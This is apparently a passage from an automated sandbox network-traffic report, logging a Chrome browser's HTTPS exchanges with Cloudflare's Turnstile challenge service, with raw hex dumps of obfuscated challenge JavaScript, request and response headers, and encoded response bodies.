                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 37 34 29 5d 3d 3d 3d 68 50 28 38 36 36 29 26 26 67 5b 68 50 28 31 32 33 31 29 5d 3d 3d 3d 68 50 28 31 32 36 36 29 29 7b 69 66 28 68 50 28 35 31 30 29 21 3d 3d 68 50 28 35 31 30 29 29 72 65 74 75 72 6e 3b 65 6c 73 65 20 66 75 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 58 28 29 7d 2c 31 65 33 29 7d 65 6c 73 65 20 67 26 26 67 5b 68 50 28 31 37 37 34 29 5d 3d 3d 3d 66 5b 68 50 28 31 30 32 33 29 5d 26 26 66 5b 68 50 28 31 32 35 38 29 5d 28 67 5b 68 50 28 31 32 33 31 29 5d 2c 66 5b 68 50 28 31 34 31 33 29 5d 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 75 29 7d 29 2c 66 77 3d 21 5b 5d 2c 21 65 5a 28 67 49 28 35 35 35 29 29 26 26 28 66 58 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 43 2c 63
                                                                                                                                                                                                                                                Data Ascii: 74)]===hP(866)&&g[hP(1231)]===hP(1266)){if(hP(510)!==hP(510))return;else fu=setInterval(function(){fX()},1e3)}else g&&g[hP(1774)]===f[hP(1023)]&&f[hP(1258)](g[hP(1231)],f[hP(1413)])&&clearInterval(fu)}),fw=![],!eZ(gI(555))&&(fX(),setInterval(function(iC,c
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 73 2c 76 2c 69 47 29 7b 72 65 74 75 72 6e 20 69 47 3d 62 2c 66 5b 69 47 28 31 37 33 35 29 5d 28 73 2c 76 29 7d 7d 2c 69 48 28 39 32 33 29 21 3d 3d 69 48 28 39 32 33 29 29 7b 69 66 28 6b 29 72 65 74 75 72 6e 3b 6c 3d 21 21 5b 5d 2c 6d 5b 69 48 28 31 32 35 31 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 49 29 7b 69 49 3d 69 48 2c 6e 5b 69 49 28 31 33 32 37 29 5d 28 42 2c 43 2c 44 2c 45 2b 31 29 7d 2c 6e 5b 69 48 28 35 30 30 29 5d 28 32 35 30 2c 78 2b 31 29 29 7d 65 6c 73 65 20 68 5e 3d 6a 5b 69 48 28 31 35 35 38 29 5d 28 6d 29 7d 29 2c 63 3d 65 4d 5b 69 45 28 31 31 30 35 29 5d 28 63 29 2c 69 3d 5b 5d 2c 67 3d 2d 31 3b 21 66 5b 69 45 28 31 33 31 39 29 5d 28 69 73 4e 61 4e 2c 6b 3d 63 5b 69 45 28 31 35 35 38 29 5d 28 2b 2b 67 29 29 3b 69 5b 69 45 28 39 31 35 29 5d
                                                                                                                                                                                                                                                Data Ascii: s,v,iG){return iG=b,f[iG(1735)](s,v)}},iH(923)!==iH(923)){if(k)return;l=!![],m[iH(1251)](function(iI){iI=iH,n[iI(1327)](B,C,D,E+1)},n[iH(500)](250,x+1))}else h^=j[iH(1558)](m)}),c=eM[iE(1105)](c),i=[],g=-1;!f[iE(1319)](isNaN,k=c[iE(1558)](++g));i[iE(915)]
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 68 3d 3d 69 7d 2c 27 68 56 45 6d 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 48 73 54 54 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 69 72 42 52 44 27 3a 6a 71 28 39 36 35 29 2c 27 68 43 4c 46 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4e 70 48 65 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 6a 6c 6c 53 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 78 41 70 56 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 50 46 64 6a 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                                                                                                                                                                                                                                                Data Ascii: h==i},'hVEmj':function(h,i){return i==h},'HsTTF':function(h,i){return h(i)},'irBRD':jq(965),'hCLFY':function(h,i){return h(i)},'NpHeY':function(h,i){return h==i},'jllSZ':function(h,i){return h(i)},'xApVk':function(h,i){return i!=h},'PFdjy':function(h,i){r
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 26 28 44 3d 4d 61 74 68 5b 6a 73 28 35 35 36 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 53 74 72 69 6e 67 28 4b 29 29 7d 69 66 28 27 27 21 3d 3d 43 29 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 73 28 36 35 39 29 5d 5b 6a 73 28 31 32 35 32 29 5d 5b 6a 73 28 31 36 36 32 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 6a 73 28 31 35 35 38 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 6a 73 28 31 30 34 34 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 6a 73 28 39 31 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 73 28 31 35 35 38 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 6a 73 28 39 32 37 29 5d 28 48 3c 3c 31 2c 4d 26 31 29 2c 49 3d
                                                                                                                                                                                                                                                Data Ascii: &(D=Math[js(556)](2,F),F++),x[L]=E++,String(K))}if(''!==C){if(Object[js(659)][js(1252)][js(1662)](B,C)){if(256>C[js(1558)](0)){for(s=0;d[js(1044)](s,F);H<<=1,j-1==I?(I=0,G[js(915)](o(H)),H=0):I++,s++);for(M=C[js(1558)](0),s=0;8>s;H=d[js(927)](H<<1,M&1),I=
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 6f 72 28 4d 3d 6a 77 28 39 34 39 29 5b 6a 77 28 31 33 38 39 29 5d 28 27 7c 27 29 2c 4e 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4d 5b 4e 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 4b 7c 3d 47 2a 28 30 3c 4f 3f 31 3a 30 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 64 5b 6a 77 28 33 33 36 29 5d 28 30 2c 49 29 26 26 28 49 3d 6a 2c 48 3d 64 5b 6a 77 28 31 31 36 37 29 5d 28 6f 2c 4a 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 49 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 4f 3d 48 26 49 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 47 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4b 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 6a
                                                                                                                                                                                                                                                Data Ascii: or(M=jw(949)[jw(1389)]('|'),N=0;!![];){switch(M[N++]){case'0':K|=G*(0<O?1:0);continue;case'1':d[jw(336)](0,I)&&(I=j,H=d[jw(1167)](o,J++));continue;case'2':I>>=1;continue;case'3':O=H&I;continue;case'4':G<<=1;continue}break}switch(K){case 0:for(K=0,L=Math[j


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                22192.168.2.649748104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC927OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 3622
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                CF-Challenge: 6e64b4d206e3507
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC3622OUTData Raw: 76 5f 38 63 63 64 38 32 38 39 62 63 31 38 34 32 32 38 3d 38 77 30 64 70 64 49 64 77 64 4e 64 51 55 41 39 55 41 61 64 55 4d 63 65 25 32 62 57 55 6d 41 2b 41 45 68 4d 66 35 32 41 4c 78 6b 41 32 32 55 58 41 62 41 72 4d 6d 65 44 32 41 79 4b 5a 64 38 70 4b 63 24 33 6e 41 24 64 2b 44 6c 68 66 6f 32 41 4c 41 33 62 4d 41 7a 41 33 61 30 41 63 33 54 44 41 51 41 56 77 49 49 45 61 73 49 33 58 41 4c 64 6d 58 2d 65 5a 70 41 33 57 41 2d 64 55 35 53 4a 58 52 31 73 41 7a 66 46 65 59 66 66 41 38 30 78 30 41 6d 30 41 35 4e 68 30 55 34 72 76 68 7a 37 62 76 2d 66 4d 39 2b 33 35 66 41 55 4c 57 64 63 55 63 41 4e 30 74 6f 32 41 78 79 64 41 4a 79 44 41 4b 70 72 30 24 41 33 56 41 73 4f 35 56 69 44 57 68 4e 6f 57 41 6b 65 41 37 64 41 68 37 41 33 68 46 6e 44 41 4f 64 41 6c 63 41 33
                                                                                                                                                                                                                                                Data Ascii: v_8ccd8289bc184228=8w0dpdIdwdNdQUA9UAadUMce%2bWUmA+AEhMf52ALxkA22UXAbArMmeD2AyKZd8pKc$3nA$d+Dlhfo2ALA3bMAzA3a0Ac3TDAQAVwIIEasI3XALdmX-eZpA3WA-dU5SJXR1sAzfFeYffA80x0Am0A5Nh0U4rvhz7bv-fM9+35fAULWdcUcAN0to2AxydAJyDAKpr0$A3VAsO5ViDWhNoWAkeA7dAh7A3hFnDAOdAlcA3
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC717INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 152224
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-gen: jxmH+AeprZPhgCHvC3/EVF74NDPpwivaW33DnfdvBpsoOVsQ/rfoOa3NiGdBWV8v0FN0xExIETp114EU6LC8GRdYJ0JkKCgmWhZtsLkBfKvxhLs/8ZlgrvmWaRFMl67mY/rnLA5l34/ZrNPmPLZc7n6AJ7Zsx/tpW9f+zuHhvBbQ0Jxs8nv96/ypQ0DjukK/8cYJpnv24AFkGWamR9hwBbyazmrTWXujWzcfj00ULGby+HV6s88HJO7O60Fb76SMpeFzu6LDAvGYNAM2tEyZdkuvLRmSTjPFT1ajgkmJ3TwIhPMApPBsjNRPRrfRSOw8EU1TSeOLYIeK+OwYO+T9WTyEPNtDVofor+s/SwmSZCon3WTgujamN0OjIpvDgqJeW8LBCn8lktGllJkZyONTRn65gMDaCwp0D3saj+J2/NRaGsGLQt6NBPM1egYW6Trli+uDMS6YGmffIR7GTyTSZC3Hw/HwF9vGXnjRMu2MxjjuZYs=$f7o2Jd56X2UrbSdY
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd829e7939727a-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC652INData Raw: 6a 58 36 4f 56 33 56 6f 6a 6f 36 46 6b 57 78 36 6f 56 71 69 6f 34 47 5a 65 49 65 59 6c 49 69 73 68 34 4f 77 73 48 71 76 66 72 46 31 6f 6e 4b 47 65 4b 79 77 70 6e 79 71 77 4b 6e 43 72 72 71 58 68 4c 69 77 73 6f 69 65 7a 49 65 57 75 35 37 51 71 70 4c 55 30 35 44 43 7a 4a 4f 4c 6b 61 72 63 74 73 6e 67 6d 4b 75 36 34 4f 43 75 30 71 4b 31 73 62 4c 67 6f 36 7a 67 77 74 71 77 79 74 4c 52 76 2b 44 32 79 72 6a 73 30 75 61 39 76 72 32 39 77 63 4c 42 77 63 54 79 77 66 54 48 2b 50 33 5a 7a 41 48 65 2b 74 44 49 44 52 48 54 46 52 45 56 31 77 6a 30 32 78 33 70 2b 39 66 67 33 2f 55 4e 47 79 48 35 46 51 6e 31 2f 69 55 64 4b 43 59 63 35 77 67 64 45 7a 63 68 39 53 4c 79 44 2f 49 4b 39 43 6f 4c 4f 66 67 38 41 54 56 44 41 55 68 4a 4d 6a 6b 68 4f 53 59 6f 4a 6b 73 53 4b 69 39
                                                                                                                                                                                                                                                Data Ascii: jX6OV3Vojo6FkWx6oVqio4GZeIeYlIish4OwsHqvfrF1onKGeKywpnyqwKnCrrqXhLiwsoiezIeWu57QqpLU05DCzJOLkarctsngmKu64OCu0qK1sbLgo6zgwtqwytLRv+D2yrjs0ua9vr29wcLBwcTywfTH+P3ZzAHe+tDIDRHTFREV1wj02x3p+9fg3/UNGyH5FQn1/iUdKCYc5wgdEzch9SLyD/IK9CoLOfg8ATVDAUhJMjkhOSYoJksSKi9
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 53 47 43 43 57 56 68 65 67 45 56 32 67 56 35 38 5a 45 53 4a 57 49 78 67 55 56 35 78 63 49 42 69 69 4a 57 5a 65 58 47 4c 6a 6c 31 37 6b 4a 70 75 6e 35 56 36 66 31 36 45 59 6f 70 31 69 33 70 36 67 5a 36 46 63 59 31 2f 67 71 36 4b 6a 4b 57 62 6b 72 47 57 6c 48 75 2f 6c 37 39 37 66 37 57 43 6e 5a 71 79 76 62 76 4a 70 4a 2b 68 72 36 43 67 71 39 4f 57 7a 39 65 77 78 74 50 4b 32 37 4f 6f 31 4a 69 38 34 4d 48 6b 35 4e 4f 6a 78 75 62 58 77 62 61 32 7a 4c 72 44 73 4d 37 42 76 66 54 6e 74 4d 48 34 36 39 33 46 2f 4f 2f 52 79 51 48 79 77 4d 30 46 39 75 6e 52 43 66 72 64 31 51 33 39 7a 4e 6b 52 41 64 44 64 46 51 55 51 34 52 6b 4a 2f 65 55 64 44 4e 7a 70 49 52 41 5a 34 68 4d 45 46 68 67 44 43 76 73 6a 45 43 7a 35 2b 69 34 41 37 44 55 78 4e 77 6f 36 4e 79 73 4f 50 6a 77
                                                                                                                                                                                                                                                Data Ascii: SGCCWVhegEV2gV58ZESJWIxgUV5xcIBiiJWZeXGLjl17kJpun5V6f16EYop1i3p6gZ6FcY1/gq6KjKWbkrGWlHu/l797f7WCnZqyvbvJpJ+hr6Cgq9OWz9ewxtPK27Oo1Ji84MHk5NOjxubXwba2zLrDsM7BvfTntMH4693F/O/RyQHywM0F9unRCfrd1Q39zNkRAdDdFQUQ4RkJ/eUdDNzpIRAZ4hMEFhgDCvsjECz5+i4A7DUxNwo6NysOPjw
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 58 4a 6c 59 6d 6c 70 57 6d 5a 6a 63 48 31 63 58 57 52 52 61 56 4e 2f 6b 31 57 5a 6b 33 46 6e 69 6f 6c 7a 62 47 4a 76 62 32 35 6b 6d 58 4e 79 5a 35 53 6a 61 59 64 68 65 58 71 53 6e 35 2b 70 63 59 4f 47 63 6f 36 6f 69 4c 32 77 6a 6f 70 38 6a 72 69 57 64 35 4b 38 6e 4c 32 57 77 4b 44 46 6d 73 53 6b 7a 73 32 66 71 4d 47 74 79 64 48 49 78 4d 58 50 79 61 65 36 31 4a 4f 31 34 2b 48 6c 34 4c 76 6f 32 72 61 32 76 63 43 2f 34 2b 65 74 73 64 44 6e 34 4d 76 53 37 4f 48 4f 31 75 36 39 32 75 65 35 2f 67 48 2b 42 4e 66 6c 33 66 4c 44 33 67 30 42 42 2f 72 35 2b 41 50 71 43 63 37 66 46 63 30 49 34 52 6b 4a 2f 65 55 64 44 4e 7a 70 49 52 41 5a 34 68 4d 45 46 68 67 44 43 76 73 6a 45 43 7a 35 2b 69 37 74 35 6a 63 68 42 51 34 37 4e 78 55 4f 50 6a 7a 39 47 79 45 53 4e 51 45 59
                                                                                                                                                                                                                                                Data Ascii: XJlYmlpWmZjcH1cXWRRaVN/k1WZk3FniolzbGJvb25kmXNyZ5SjaYdheXqSn5+pcYOGco6oiL2wjop8jriWd5K8nL2WwKDFmsSkzs2fqMGtydHIxMXPyae61JO14+Hl4Lvo2ra2vcC/4+etsdDn4MvS7OHO1u692ue5/gH+BNfl3fLD3g0BB/r5+APqCc7fFc0I4RkJ/eUdDNzpIRAZ4hMEFhgDCvsjECz5+i7t5jchBQ47NxUOPjz9GyESNQEY
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 69 46 65 6e 70 37 62 34 4b 44 63 46 52 57 69 5a 61 45 57 70 68 70 61 6c 69 63 6c 70 46 39 6b 58 56 6c 59 58 43 53 70 6e 57 45 6f 71 70 35 72 6f 31 2b 63 57 70 39 69 49 43 6c 68 48 65 4f 6b 37 61 36 66 62 36 67 77 49 48 43 6f 49 47 51 74 5a 54 47 69 59 53 57 6c 73 61 5a 71 35 43 75 6f 72 44 48 70 4b 48 55 74 4c 6a 45 74 37 4b 72 30 74 50 4b 32 4e 36 33 31 73 61 7a 76 4e 58 5a 76 2b 50 61 70 63 58 42 76 62 4c 66 38 72 4f 31 30 76 44 34 2b 66 7a 62 37 64 58 7a 30 2f 7a 39 74 74 50 35 76 2b 6a 79 41 4d 6e 43 33 63 7a 4a 35 2f 48 6b 30 39 7a 30 43 74 62 75 47 39 48 5a 43 2f 58 72 38 41 38 52 44 51 54 75 34 68 50 38 49 66 63 73 49 69 6f 75 2b 67 33 37 43 41 73 4a 4c 51 34 54 4e 41 58 31 44 2f 67 34 50 50 30 4d 48 42 6f 38 46 6b 4d 42 51 44 4d 68 4a 30 41 34 41
                                                                                                                                                                                                                                                Data Ascii: iFenp7b4KDcFRWiZaEWphpaliclpF9kXVlYXCSpnWEoqp5ro1+cWp9iIClhHeOk7a6fb6gwIHCoIGQtZTGiYSWlsaZq5CuorDHpKHUtLjEt7Kr0tPK2N631sazvNXZv+PapcXBvbLf8rO10vD4+fzb7dXz0/z9ttP5v+jyAMnC3czJ5/Hk09z0CtbuG9HZC/Xr8A8RDQTu4hP8IfcsIiou+g37CAsJLQ4TNAX1D/g4PP0MHBo8FkMBQDMhJ0A4A
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 7a 69 34 4b 52 64 6f 70 79 6b 32 74 6e 6e 47 69 66 61 61 43 53 68 57 32 6b 6c 6e 6c 78 71 4a 6c 6f 64 61 79 63 62 48 6d 77 6f 4b 74 39 74 4b 53 5a 67 62 69 6e 65 49 57 38 71 37 52 2b 72 70 2b 78 73 35 36 6c 6c 37 36 72 78 35 57 57 79 5a 65 43 6f 35 79 38 7a 63 72 4f 6f 71 33 56 78 4e 61 76 71 39 58 4a 6e 4c 2f 4b 31 64 36 33 30 38 50 67 70 74 72 6f 70 72 33 74 76 2b 4c 51 38 73 65 30 39 72 53 70 39 4c 66 33 78 4f 6e 59 2b 38 6a 72 34 50 36 31 38 75 41 42 78 39 37 49 31 38 72 39 41 2f 6a 42 44 76 72 4a 33 41 44 77 45 74 66 75 47 39 48 5a 47 2f 77 49 35 2f 58 73 32 75 49 57 42 52 48 6c 46 78 7a 39 36 68 37 6e 47 65 45 75 47 2b 6e 38 49 43 38 79 39 68 41 56 4f 41 55 70 4f 2f 58 78 4c 78 34 56 44 6a 74 47 4a 6a 6f 54 41 52 6b 48 4f 67 55 6b 4c 54 77 4a 4b 43
                                                                                                                                                                                                                                                Data Ascii: zi4KRdopyk2tnnGifaaCShW2klnlxqJlodaycbHmwoKt9tKSZgbineIW8q7R+rp+xs56ll76rx5WWyZeCo5y8zcrOoq3VxNavq9XJnL/K1d6308Pgptropr3tv+LQ8se09rSp9Lf3xOnY+8jr4P618uABx97I18r9A/jBDvrJ3ADwEtfuG9HZG/wI5/Xs2uIWBRHlFxz96h7nGeEuG+n8IC8y9hAVOAUpO/XxLx4VDjtGJjoTARkHOgUkLTwJKC
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 69 35 4a 37 5a 6f 68 2f 65 31 69 66 6d 70 6c 35 70 33 79 64 70 61 65 69 6f 59 47 74 6d 47 70 76 6f 35 53 79 66 71 57 75 72 4c 61 72 73 59 65 4c 71 59 35 39 76 38 46 2b 74 49 53 33 76 49 58 46 75 70 79 71 68 63 33 45 30 49 33 44 6a 72 62 55 77 4a 58 59 31 63 61 72 79 61 76 64 6e 39 4b 75 33 4b 4f 77 74 2b 57 38 73 37 33 57 75 75 79 74 36 2b 62 6c 78 66 50 45 78 72 54 67 37 76 53 79 35 73 7a 36 79 51 43 39 74 39 41 45 32 4e 2f 58 39 66 48 39 33 50 51 42 78 51 33 36 2b 51 58 4c 42 4d 37 75 7a 51 48 58 36 2b 73 49 36 2f 72 57 43 75 37 68 32 79 4c 6a 48 69 51 6d 2f 50 66 37 47 68 66 2b 4b 52 77 42 4c 65 73 65 41 2b 63 78 49 52 67 54 39 43 73 6e 46 51 39 41 2f 66 63 54 52 41 41 36 45 44 55 63 51 68 77 38 44 45 6f 5a 50 41 6f 50 4a 6a 38 30 4d 43 70 57 47 46 59
                                                                                                                                                                                                                                                Data Ascii: i5J7Zoh/e1ifmpl5p3ydpaeioYGtmGpvo5SyfqWurLarsYeLqY59v8F+tIS3vIXFupyqhc3E0I3DjrbUwJXY1caryavdn9Ku3KOwt+W8s73Wuuyt6+blxfPExrTg7vSy5sz6yQC9t9AE2N/X9fH93PQBxQ36+QXLBM7uzQHX6+sI6/rWCu7h2yLjHiQm/Pf7Ghf+KRwBLeseA+cxIRgT9CsnFQ9A/fcTRAA6EDUcQhw8DEoZPAoPJj80MCpWGFY
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 4a 36 54 58 61 5a 78 6b 48 65 5a 64 35 74 6d 64 33 65 70 6d 47 64 2f 73 6e 4f 79 69 4c 43 69 71 62 65 35 70 72 61 4b 76 33 2b 35 76 62 79 57 65 35 58 47 77 73 4b 58 78 4c 53 44 6c 38 2b 6b 7a 71 54 54 70 6f 2b 6d 31 71 7a 4e 31 64 6d 77 70 39 76 66 32 74 36 76 33 62 69 33 74 39 44 65 34 4f 6a 61 79 37 62 71 32 4b 2f 47 72 64 2b 76 37 50 4c 67 32 4e 50 48 35 74 44 4f 2b 4f 76 51 2f 4c 76 74 30 72 63 42 39 75 62 47 32 77 72 4c 2f 74 34 4a 7a 77 50 6b 46 41 38 47 35 77 59 44 36 68 55 49 37 42 6e 58 43 75 37 54 48 51 30 45 2f 75 41 58 45 77 48 36 4c 4f 6e 6a 2f 6a 44 76 49 77 59 6b 46 51 55 42 4b 42 67 70 38 69 63 63 42 7a 77 72 4f 78 6b 51 50 51 51 6c 45 30 63 7a 4a 42 77 36 4e 78 39 4b 4f 79 41 2b 49 46 49 55 55 79 6c 57 4b 78 41 6f 58 44 45 39 4c 31 42 42
                                                                                                                                                                                                                                                Data Ascii: J6TXaZxkHeZd5tmd3epmGd/snOyiLCiqbe5praKv3+5vbyWe5XGwsKXxLSDl8+kzqTTpo+m1qzN1dmwp9vf2t6v3bi3t9De4Ojay7bq2K/Grd+v7PLg2NPH5tDO+OvQ/Lvt0rcB9ubG2wrL/t4JzwPkFA8G5wYD6hUI7BnXCu7THQ0E/uAXEwH6LOnj/jDvIwYkFQUBKBgp8iccBzwrOxkQPQQlE0czJBw6Nx9KOyA+IFIUUylWKxAoXDE9L1BB
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 69 6d 64 61 74 6e 6f 58 65 72 6b 4b 69 75 6e 4a 4e 2b 62 72 4f 57 64 6f 32 6e 73 59 71 38 71 70 2f 42 66 37 4f 6b 77 70 62 48 71 4a 72 45 74 35 7a 49 68 37 6d 65 67 38 7a 43 73 70 4b 6e 31 5a 58 61 72 4e 75 77 74 39 76 65 74 4c 79 31 30 38 53 30 73 4e 4f 68 70 72 33 57 79 38 66 42 37 61 2f 74 77 2b 48 64 36 63 6a 67 37 4c 48 34 35 75 58 78 75 2f 37 71 39 4c 6b 45 34 2b 54 58 39 4e 76 43 42 2f 73 44 36 39 62 34 37 2b 76 49 45 66 7a 52 46 67 50 6e 43 64 49 5a 32 74 58 57 43 76 41 4f 33 67 37 7a 42 4f 55 59 43 53 66 36 4b 65 55 6d 41 53 41 6e 4b 75 34 6a 46 52 51 45 4a 79 4c 79 4e 79 63 63 43 41 34 39 2f 76 6e 36 4c 68 55 79 41 7a 49 59 4b 41 6f 38 4c 55 73 69 54 51 6f 76 52 6a 55 7a 4e 42 4e 48 4f 54 67 6f 53 30 59 58 57 30 74 41 4c 44 4a 68 49 78 34 66 55
                                                                                                                                                                                                                                                Data Ascii: imdatnoXerkKiunJN+brOWdo2nsYq8qp/Bf7OkwpbHqJrEt5zIh7meg8zCspKn1ZXarNuwt9vetLy108S0sNOhpr3Wy8fB7a/tw+Hd6cjg7LH45uXxu/7q9LkE4+TX9NvCB/sD69b47+vIEfzRFgPnCdIZ2tXWCvAO3g7zBOUYCSf6KeUmASAnKu4jFRQEJyLyNyccCA49/vn6LhUyAzIYKAo8LUsiTQovRjUzNBNHOTgoS0YXW0tALDJhIx4fU
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 74 68 34 6d 45 6a 34 43 4c 71 34 4b 68 74 49 36 72 6a 6f 57 38 75 36 2b 79 76 49 47 78 6f 4a 71 69 71 4c 69 79 77 4a 76 4d 71 61 33 44 6e 71 66 45 6f 61 37 46 74 64 57 6a 6c 4b 66 54 78 35 72 67 32 70 75 32 6d 37 44 6d 75 37 47 39 34 64 62 70 34 36 33 59 77 37 43 71 75 73 79 38 39 63 7a 33 32 66 48 6d 7a 2b 6e 49 79 64 43 39 31 62 2b 37 30 41 66 69 30 63 67 43 39 41 6f 45 7a 4d 62 59 43 4f 72 51 34 50 51 41 38 73 6b 57 36 64 6a 56 38 2f 44 79 32 77 30 4d 36 2b 4d 42 37 75 49 6f 35 79 6f 4c 2b 53 63 73 44 77 76 38 41 65 6e 39 4c 50 51 79 36 53 6a 78 42 51 76 36 47 67 34 7a 45 44 6c 44 47 7a 42 48 2f 51 67 30 48 54 51 46 41 79 30 70 42 79 6c 48 45 6b 34 6a 52 43 49 75 53 42 64 61 52 44 49 6f 55 55 6f 30 4b 69 34 77 4d 43 38 64 57 6a 51 7a 48 56 34 34 4e 79
                                                                                                                                                                                                                                                Data Ascii: th4mEj4CLq4KhtI6rjoW8u6+yvIGxoJqiqLiywJvMqa3DnqfEoa7FtdWjlKfTx5rg2pu2m7Dmu7G94dbp463Yw7Cqusy89cz32fHmz+nIydC91b+70Afi0cgC9AoEzMbYCOrQ4PQA8skW6djV8/Dy2w0M6+MB7uIo5yoL+ScsDwv8Aen9LPQy6SjxBQv6Gg4zEDlDGzBH/Qg0HTQFAy0pBylHEk4jRCIuSBdaRDIoUUo0Ki4wMC8dWjQzHV44Ny


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                23192.168.2.649749104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:30 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
